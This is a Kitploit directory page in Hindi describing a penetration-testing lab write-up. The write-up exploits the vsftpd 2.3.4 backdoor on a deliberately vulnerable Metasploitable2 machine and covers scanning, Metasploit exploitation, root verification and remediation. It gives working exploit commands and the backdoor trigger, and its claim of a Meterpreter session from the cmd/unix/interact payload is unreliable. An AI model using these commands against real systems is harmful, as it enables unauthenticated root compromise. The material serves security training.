Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
metasploitable2-vsftpd-writeup — Metasploitable2 पर vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण — रिकॉन, एक्सप्लॉयटेशन और रेमेडिएशन को कवर करने वाला एक व्यावहारिक पेंटेस्टिंग लैब राइटअप। | Kitploit
उपकरण/GitHubGitHub/rsakthikumar-cmd/metasploitable2-vsftpd-writeup
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
rsakthikumar-cmd/metasploitable2-vsftpd-writeup

metasploitable2-vsftpd-writeup

Metasploitable2 पर vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण — रिकॉन, एक्सप्लॉयटेशन और रेमेडिएशन को कवर करने वाला एक व्यावहारिक पेंटेस्टिंग लैब राइटअप।

रिपॉजिटरी देखें
281 महीना पहलेअभी तक समीक्षित नहीं

Metasploitable2 — vsftpd 2.3.4 बैकडोर शोषण

एक व्यावहारिक प्रयोगशाला जो vsftpd 2.3.4 में ज्ञात बैकडोर भेद्यता की खोज और शोषण को प्रदर्शित करती है, एक पृथक Kali Linux ↔ Metasploitable2 वातावरण का उपयोग करते हुए।

उद्देश्य

जानबूझकर कमजोर लक्ष्य मशीन के विरुद्ध कोर पैठ परीक्षण कार्यप्रवाह — टोही, भेद्यता पहचान, शोषण, और पोस्ट-एक्सप्लॉइटेशन सत्यापन — का अभ्यास करें।

प्रयोगशाला वातावरण

घटकविवरण
आक्रमणकर्ताKali Linux 2026.1 (VMware)
लक्ष्यMetasploitable2 (VMware)
नेटवर्कNAT, होस्ट/इंटरनेट से पृथक
लक्ष्य IP192.168.233.129

दोनों VM को एक ही निजी नेटवर्क सेगमेंट पर रखा गया था, वास्तविक नेटवर्क से पृथक, ताकि यह सुनिश्चित किया जा सके कि अभ्यास का कोई बाहरी जोखिम न हो।

कार्यप्रणाली

1. टोही — Nmap स्कैन

nmap -sV -sC 192.168.233.129

लक्ष्य को खुले पोर्ट और सेवा संस्करणों के लिए स्कैन किया। परिणामों में शामिल थे:

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
...

Nmap स्कैन जो vsftpd 2.3.4 दिखा रहा है

2. भेद्यता पहचान

पोर्ट 21 पर vsftpd 2.3.4 चल रहा था। यह विशिष्ट संस्करण सार्वजनिक रूप से बैकडोर युक्त होने के लिए जाना जाता है: 2011 में, आधिकारिक vsftpd स्रोत संग्रह से छेड़छाड़ की गई और दुर्भावनापूर्ण कोड डाला गया। :) स्ट्रिंग वाले उपयोगकर्ता नाम से लॉग इन करने पर TCP पोर्ट 6200 पर एक छिपा हुआ लिसनर सक्रिय होता है, जो बिना प्रमाणीकरण के रिमोट शेल प्रदान करता है।

  • संदर्भ: CVE-2011-2523
  • प्रभाव: रूट के रूप में बिना प्रमाणीकरण के रिमोट कोड निष्पादन

3. शोषण — Metasploit

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run

शोषण ने सफलतापूर्वक बैकडोर को सक्रिय किया और एक Meterpreter सत्र लौटाया।

Metasploit शोषण रन जो Meterpreter सत्र खुला दिखा रहा है

4. पोस्ट-एक्सप्लॉइटेशन सत्यापन

sessions -i 1
sysinfo
getuid

समझौता किए गए होस्ट पर सक्रिय सत्र और पहुंच स्तर की पुष्टि की।

sysinfo आउटपुट

getuid आउटपुट जो रूट एक्सेस की पुष्टि करता है

परिणाम

केवल एक पुरानी और बैकडोर युक्त सेवा का शोषण करके, बिना किसी प्रमाणीकरण की आवश्यकता के, लक्ष्य मशीन पर पूर्ण रूट-स्तरीय रिमोट शेल एक्सेस प्राप्त किया।

मूल कारण

  • पुराना सॉफ़्टवेयर संस्करण (vsftpd 2.3.4) जो स्रोत पर समझौता किया गया था
  • ज्ञात-कमजोर सेवा संस्करण का पता लगाने या पैच करने के लिए कोई प्रक्रिया नहीं

सुधार के उपाय

  • vsftpd को वर्तमान, सत्यापित-स्वच्छ रिलीज़ में अपग्रेड करें
  • सॉफ़्टवेयर पैकेज हमेशा आधिकारिक/सत्यापित रिपॉजिटरी से चेकसम सत्यापन के साथ डाउनलोड करें
  • परिनियोजन से पहले पुराने सेवा संस्करणों को पकड़ने के लिए नियमित भेद्यता स्कैनिंग लागू करें
  • अनावश्यक रूप से उजागर सेवाओं (FTP) को जहाँ आवश्यक न हो, प्रतिबंधित करें, या अतिरिक्त एक्सेस नियंत्रण के पीछे रखें

मुख्य निष्कर्ष

एक ज्ञात, सार्वजनिक भेद्यता वाली एकमात्र पुरानी सेवा पूर्ण सिस्टम समझौते के लिए पर्याप्त थी — किसी कस्टम शोषण विकास या उन्नत तकनीक की आवश्यकता नहीं थी। यह उजागर करता है कि पैच प्रबंधन और संस्करण स्वच्छता वास्तविक दुनिया के सुरक्षा आसन की नींव क्यों हैं।

अस्वीकरण

यह अभ्यास विशेष रूप से Metasploitable2 के विरुद्ध किया गया था, जो सुरक्षा प्रशिक्षण के लिए डिज़ाइन की गई जानबूझकर कमजोर वर्चुअल मशीन है, एक पृथक लैब नेटवर्क के भीतर जिसका उत्पादन प्रणालियों या तृतीय-पक्ष बुनियादी ढांचे से कोई संबंध नहीं है।

टूल डाउनलोड करें